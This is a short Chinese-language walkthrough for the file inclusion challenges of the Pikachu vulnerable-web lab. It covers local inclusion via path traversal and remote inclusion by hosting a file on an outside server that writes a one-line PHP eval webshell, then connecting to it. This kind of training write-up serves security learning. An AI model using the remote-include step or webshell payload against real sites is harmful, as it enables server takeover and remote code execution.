pikachu文件包含漏洞靶场通关攻略
本地文件包含
首先,在靶场根目录下创建一个php文件,内容是phpinfo();
其次,上传一个任意球星图片,会跳转到带有filename参数的php文件下
然后,将filename的参数改为可以访问到我们创建的php文件的地址
../../../../2.php
就可以访问到我们的phpinfo
远程文件包含
在进行远程文件包含时,要先修改两个参数
php.ini下的allow_url_include和allow_url_fopen两个参数改为On,前面的冒号也要删掉
(看自己是什么版本的PHP,要和版本对应)
进行任意图片提交
在云服务器上创建一个2.txt文件 内容是
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>
就是创建一个shell.php 文件,文件内容为一句话木马
然后,将filename的参数改为我们2.txt的地址
http://47.121.191.208/2.txt
回车后就可以在fileinclude目录下找到我们上传的shell.php文件
接下来使用连接工具进行webshell连接,成功连接